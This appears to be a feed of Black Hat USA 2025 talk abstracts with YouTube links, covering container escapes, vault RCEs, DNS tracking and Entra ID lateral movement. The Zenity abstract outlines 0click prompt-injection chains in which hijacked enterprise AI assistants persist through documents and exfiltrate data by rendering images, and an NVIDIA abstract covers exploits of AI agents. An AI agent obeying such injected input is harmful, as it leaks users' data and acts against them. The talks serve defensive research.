Black Hat USA 2025 | Breaking Out of The AI Cage: Pwning AI Providers with NVIDIA Vulnerabilities

The overwhelming majority of AI applications run on NVIDIA hardware and software and use NVIDIA tools to containerize and isolate applications running on the same infrastructure. A vulnerability in this single point of failure could allow the breakdown of security mechanisms and takeover of the AI infrastructure. In this research project, we managed to prove this scenario is indeed possible. We found a critical vulnerability in one of the foundational software components that powers all the world's AI managed infrastructure: the NVIDIA Container Toolkit. This vulnerability allows an attacker to escape from the container to the underlying host and often compromise the entire Kubernetes cluster. We tested this vulnerability on all major AI platforms, all of which proved to be susceptible to this attack. In some cases, the container escape was sufficient to prove unauthorized cross-tenant data access. Including credentials and customer data, breaching the platform's foundational security model. We'll take a deep dive into two case studies with completely different results: Replicate and DigitalOcean. In this talk, we will dive into our findings, starting from the discovery of the vulnerability itself, through its real-world exploitation on AI cloud services, finishing with the details of industry-wide impact. Attendees will learn about how major cloud services operate their security behind the scenes and the lessons they can apply to their own environment. By: Andres Riancho | Security Researcher, Wiz Hillai Ben-Sasson | Security Researcher, Wiz Ronen Shustin | Security Researcher, Wiz Presentation Materials Available at: https://ift.tt/EsT7Fe9

source https://www.youtube.com/watch?v=5RH0StmV7Eo

Black Hat USA 2025 | Autonomous Timeline Analysis and Threat Hunting: An AI Agent for Timesketch

Digital incident timeline analysis is a complex and time-consuming task. It demands highly skilled professionals with deep domain knowledge, who must invest significant time, sometimes weeks, to unravel difficult cases. Investigators must reconstruct event timelines, from initial access to exploitation and lateral movement, by sifting through hundreds of millions of log records from hundreds of different and potentially unfamiliar log types. Log-normalization and collaborative analysis tools like Plaso and Timesketch offer valuable assistance, yet the cost in time and expertise remains substantial. In this talk, we present the first AI-powered agent capable of autonomously performing digital forensic analysis on the large and varied log volumes typically encountered in real–world incidents. Furthermore, we demonstrate the agent's proficiency in threat hunting, that is, identifying and explaining evidence of system compromise without needing predefined attack signatures. We evaluate our technique on a dataset of 100 diverse, real-world compromised systems. The agent achieves high recall and precision on finding and contextualizing individual log records pertaining to the overall attack chain. This performance is driven by a core combining sophisticated prompting techniques and reinforcement learning. By: Alex Kantchelian | Staff Software Engineer, Google Maarten van Dantzig | Senior Security Engineer, Google Diana Kramer | Senior Security Engineer, Google Presentation Materials Available at: https://ift.tt/C3Z5sHB

source https://www.youtube.com/watch?v=9EA7kz4bGvQ

Black Hat USA 2025 | AI Enterprise Compromise - 0click Exploit Methods

Compromising a well-protected enterprise used to require careful planning, proper resources, and the ability to execute. Not anymore! Enter AI. Initial access? AI is happy to let you operate on its users' behalf. Persistence? Self-replicate through corp docs. Data harvesting? AI is the ultimate data hoarder. Exfil? Just render an image. Impact? So many tools at your disposal. There's more. You can do all this as an external attacker. No credentials required, no phishing, no social engineering, no human-in-the-loop. In-and-out with a single prompt. Last year at Black Hat USA, we demonstrated the first real-world exploitation of AI vulnerabilities impacting enterprises, living off Microsoft Copilot. A lot has changed in the AI space since... for the worse. AI assistants have morphed into agents. They read your search history, emails and chat messages. They wield tools that can manipulate the enterprise environment on behalf of users – or a malicious attacker once hijacked. We will demonstrate access-to-impact AI vulnerability chains in most flagship enterprise AI assistants: ChatGPT, Gemini, Copilot, Einstein, and their custom agent . Some require one bad click by the victim, others work with no user interaction – 0click attacks. The industry has no real solution for fixing this. Prompt injection is not another bug we can fix. It is a security problem we can manage! We will offer a security framework to help you protect your organization–the GenAI Attack Matrix. We will compare mitigations set forth by AI vendors, and share which ones successfully prevent the worst 0click attacks. Finally, we'll dissect our own attacks, breaking them down into basic TTPs, and showcase how they can be detected and mitigated. By: Michael Bargury | CTO, Zenity Tamir Ishay Sharbat | AI Researcher, Zenity Full Session Details Available at: https://ift.tt/bsKoH0d

source https://www.youtube.com/watch?v=M_BDq2hTJxU

Black Hat USA 2025 | Vaulted Severance: Your Secrets Are Now Outies

Enterprise vaults are meant to be the last line of defense – the trusted stronghold for your organization's most sensitive assets: secrets, credentials, and encryption keys. But what if the vault itself can be breached remotely – without even logging in? In this session, we disclose two novel, confirmed remote code execution (RCE) chains affecting the world's most widely adopted vault systems: HashiCorp Vault and CyberArk Conjur. For the first time, we demonstrate a full RCE chain in HashiCorp Vault, coinciding with its 10-year anniversary. For CyberArk Conjur, we present the kind of pre-auth RCE that keeps admins up at night. This isn't theoretical. We'll show it live on stage – against default, out-of-the-box configurations. And just as importantly, we'll walk through how these attacks can be detected and prevented – before your secrets become outies. By: Shahar Tal | CEO, Cyata Security Yarden Porat | Core Team Engineer, Cyata Security Full Session Details Available at: https://ift.tt/cSlOefs

source https://www.youtube.com/watch?v=KC-8DhS8x5Q

Black Hat USA 2025 | A Fireside Chat with Cognitive Scientist and AI Expert Gary Marcus

Cybersecurity, AI, and Our Brains. A Fireside Chat with Cognitive Scientist and AI Expert Gary Marcus Join us for a fireside chat with cognitive scientist Gary Marcus as we explore the new but often overhyped world of AI oracles and assistants. For the time being, the most valuable resource for security professionals and hackers isn't cutting-edge tools or vendor-purchased products. It's our brains. Our discussion examines the hype surrounding generative AI and the effects of treating it like a magic wand instead of a tool in our toolkit. We address the potential pitfalls that arise from the overuse of AI tools for cognitive offloading and discuss mitigation strategies to protect ourselves from these risks. By: Gary Marcus | Founder and Executive Chairman, Robust AI Nathan Hamiel | Senior Director of Research, Kudelski Security Full Session Details Available at: https://ift.tt/yeWDK6n

source https://www.youtube.com/watch?v=e69OE0ZjskA

Black Hat USA 2025 | Hacking the Status Quo: Tales From Leading Women in Cybersecurity

Join us for an inspiring conversation with leading women in cybersecurity, each bringing a wealth of experience spanning deep technical research, engineering, and various aspects of security leadership. In this panel, they will share their journeys, challenges, and triumphs in the ever-evolving world of cybersecurity. Whether you're a mid-career professional or a seasoned professional, this session offers a rare chance to connect directly with trailblazers who are shaping the future of the industry. Ask questions, gain real-world insights, and walk away with practical takeaways, renewed motivation, and a sense of community. Let's talk about careers, challenges, and the power of perseverance and purpose in cybersecurity. By: Valentina Palmiotti | Head of X-Force Offensive Research (XOR), IBM Kymberlee Price | Engineering Response Founder + CEO, Zatik Security Chi-en (Ashley) Shen | Security Research Engineering Technical Leader, Cisco Talos Natalie Silvanovich | Team Lead & Security Engineer, Google Project Zero Vandana Verma | Black Hat USA Review Board Member Full Session Details Available at: https://ift.tt/lpcAh4s

source https://www.youtube.com/watch?v=8V4i8TW1YXU

Black Hat USA 2025 | Exploiting DNS for Stealthy User Tracking

Who needs AI when raw statistics can do the job just as well—if not better? Every Domain Name System (DNS) query leaves a trail, and with the right statistical techniques, you can uncover user behaviors, fingerprint devices, and even track individuals across networks. This session dives into how simple yet powerful methods like frequency analysis, correlation metrics, and anomaly detection can turn DNS traffic into a goldmine of intel. We dissected over 1.5 billion DNS requests from 30,000 iOS and Android devices over a 30-day period, and the results are eye-opening. Within just minutes of observing DNS traffic, devices begin to reveal their unique fingerprints. Given only a few hours, accurate identification becomes a certainty. But here's where it gets even more interesting—iOS devices flood the network with repetitive DNS requests, hitting the same domains over and over, while Android devices operate nearly 10x more efficiently, generating far less noise. This difference isn't just a curiosity—it's the key to our findings. With as little as 20% of DNS traffic for both iOS and Android, device tracking becomes shockingly precise. Our research shows that simple statistical techniques are more than enough to achieve highly accurate tracking—no need for AI or complex models. This paves the way for real-world applications, especially in resource-constrained environments like routers, and, in general, in embedded systems. The combination of simplicity, accuracy, and scalability makes the technique a great candidate for large-scale deployments. Of course, where there's a method, there's a defense. We'll also explore countermeasures to mitigate these vulnerabilities. To this end, DNSSEC and other secure protocols offer some level of protection—though as we'll demonstrate, true privacy is much harder to achieve than most expect. By: Bela Genge | Senior Security Researcher, Bitdefender Ioan Padurean | Junior Security Researcher, Bitdefender Dan Macovei | Director of Product Management Presentation Materials Available at: https://ift.tt/5XLF28r

source https://www.youtube.com/watch?v=xQy1YcLK1Ak

Black Hat USA 2025 | From Prompts to Pwns: Exploiting and Securing AI Agents

The flexibility and power of large language models (LLMs) are now well understood, driving their integration into a wide array of real-world applications. Early use cases, such as retrieval-augmented generation (RAG), followed rigid, predictable workflows where models interacted with external systems in tightly controlled sequences. While these systems were easier to optimize and secure, they often resulted in inflexible, single-purpose tools. In contrast, modern agentic systems leverage expanded input modalities, such as speech and vision, and use more sophisticated inference strategies, such as dynamic chain-of-thought reasoning. These advancements allow them to act independently on users' behalf to automate increasingly complex workflows, often involving sensitive data and systems. As their utility increases, so too does their attack surface: more usability means broader access to data, greater ability to execute actions, and significantly more opportunity for exploitation. In this talk, we will explore the emerging security challenges posed by agentic AI systems. We demonstrate the implications of this significant shift through internal assessments and proof-of-concept exploits developed by our AI Red Team, targeting a range of agentic applications, from popular open-source tools to enterprise systems. These exploits all leverage the same core finding: that LLMs are uniquely vulnerable to malicious input, and exposure to such input can have a significant impact on the trust of downstream actions. In short, we lay out what can go wrong when agentic systems vulnerable to adversarial inputs are deployed within enterprise environments. We conclude by discussing how NVIDIA addresses the security of emerging agentic workflows, and our principles for designing agent interactions in ways that mitigate risk, emphasizing a security-first foundation for safe and scalable adoption. By: Rebecca Lynch | Offensive Security Researcher, NVIDIA Rich Harang | Principal Security Architect, NVIDIA Presentation Materials Available at: https://ift.tt/FjcC9HR

source https://www.youtube.com/watch?v=zipgr080EQU

Black Hat Europe 2025 Highlights | Record‑Breaking 4,500+ Attendees

Setting a new attendance record with more than 25% growth, Black Hat Europe 2025 brought together more than 4,500 security professionals from across the globe, showcasing the research, insights, and innovations shaping the future of cybersecurity. This year’s event delivered: ✔️Cutting‑edge content from top researchers and practitioners ✔️Hands‑on learning through labs, workshops, and demos ✔️A high‑energy Business Hall featuring the world’s leading security organizations From breakthrough briefings to unmatched networking opportunities, Black Hat Europe 2025 set the stage for the next evolution of cyber defense. Upcoming Black Hat events: https://ift.tt/CBkqYPK Become a sponsor: https://ift.tt/QPgoqcV #BlackHatEurope #BHEU #Cybersecurity #InfoSec #BlackHat

source https://www.youtube.com/watch?v=tfptvW07N-E

Black Hat USA 2025 | Locknote: Conclusions & Key Takeaways from Black Hat USA 2025

Join Black Hat USA Review Board Members for a compelling discussion on the most pressing issues facing the InfoSec community today. This distinguished panel will analyze key conference takeaways and provide valuable insights on how emerging trends will shape future security strategies. Don't miss this opportunity to hear candid perspectives from some of cybersecurity's most influential voices. By: Heather Adkins | Security Engineering Daniel Cuthbert | Global Head of Security Research Aanchal Gupta | Chief Security Officer, Adobe Jason Haddix | CEO, Hacker & Trainer, Arcanum Information Security Jeff Moss | Founder, Black Hat and DEF CON Full Session Details Available at: https://ift.tt/Ne6kX0d

source https://www.youtube.com/watch?v=DmXlafnjn0M

Black Hat USA 2025 | Advanced Active Directory to Entra ID Lateral Movement Techniques

Is there a security boundary between Active Directory and Entra ID in a hybrid environment? The answer to this question, while still somewhat unclear, has changed over the past few years as there has been more hardening of how much "the cloud" trusts data from on-premises. The reason for this is that many threat actors, including APTs, have been making use of known lateral movement techniques to compromise the cloud from AD. In this talk, we will take a deep dive together into Entra ID and hybrid AD trust internals. We will introduce several new lateral movement techniques that allow us to bypass authentication, MFA and stealthily exfiltrate data using on-premises AD as a starting point, even in environments where the classical techniques didn't work. All these techniques are new, not really vulnerabilities, but part of the design. Several of them have been remediated with recent hardening efforts by Microsoft. Very few of them leave useful logs behind when abused. As you would expect, none of these "features" are documented. Join me for a wild ride into Entra ID internals, undocumented authentication flows and tenant compromise from on-premises AD. By: Dirk-jan Mollema | Security Researcher, Outsider Security Presentation Materials Available at: https://ift.tt/X4g86EP

source https://www.youtube.com/watch?v=rzfAutv6sB8